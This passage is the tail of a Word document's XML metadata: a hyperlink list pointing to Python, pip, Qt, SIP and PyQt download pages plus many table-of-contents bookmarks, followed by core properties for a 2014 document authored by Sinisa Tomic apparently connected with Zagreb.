      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://pip.pypa.io/en/latest/installing.html</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7340087</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>336</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://sourceforge.net/projects/pyqt/files/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>4063292</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>333</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.riverbankcomputing.com/software/sip/download</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>7340142</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>330</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.qt.io/download/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5374034</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>327</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://www.python.org/downloads/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769525</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>323</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc159987579</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769525</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>320</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc159987578</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310770</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>313</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756523</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310770</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>307</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756522</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310770</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>301</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756521</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1310770</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>295</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756520</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>289</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756519</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>283</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756518</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>277</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756517</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>271</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756516</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>265</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756515</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>259</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756514</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>253</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756513</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>247</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756512</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>241</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756511</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1507378</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>235</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756510</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441842</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>229</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756509</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441842</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>223</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756508</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441842</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>217</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756507</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441842</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>211</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756506</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441842</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>205</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756505</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441842</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>199</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756504</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441842</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>193</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756503</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441842</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>187</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756502</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441842</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>181</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756501</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1441842</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>175</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756500</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031667</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>169</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756499</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031667</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>163</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756498</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031667</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>157</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756497</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031667</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>151</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756496</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031667</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>145</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756495</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031667</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>139</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756494</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031667</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>133</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756493</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031667</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>127</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756492</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031667</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>121</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756491</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2031667</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>115</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756490</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966131</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>109</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756489</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966131</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>103</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756488</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966131</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>97</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756487</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966131</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>91</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756486</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966131</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>85</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756485</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966131</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>79</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756484</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966131</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>73</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756483</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966131</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>67</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756482</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966131</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>61</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756481</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1966131</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>55</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756480</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114163</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>49</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756479</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114163</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>43</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756478</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114163</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>37</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756477</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114163</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>31</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756476</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114163</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>25</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756475</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1114163</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>19</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc406756474</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769525</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>14</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc159987577</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769525</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>8</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc159987576</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1769525</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>_Toc159987575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u Zagrebu</dc:title>
  <dc:creator>Sinisa Tomic</dc:creator>
  <cp:lastModifiedBy>Petar</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <cp:lastPrinted>2014-12-19T11:48:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-12-19T11:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-12-19T13:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>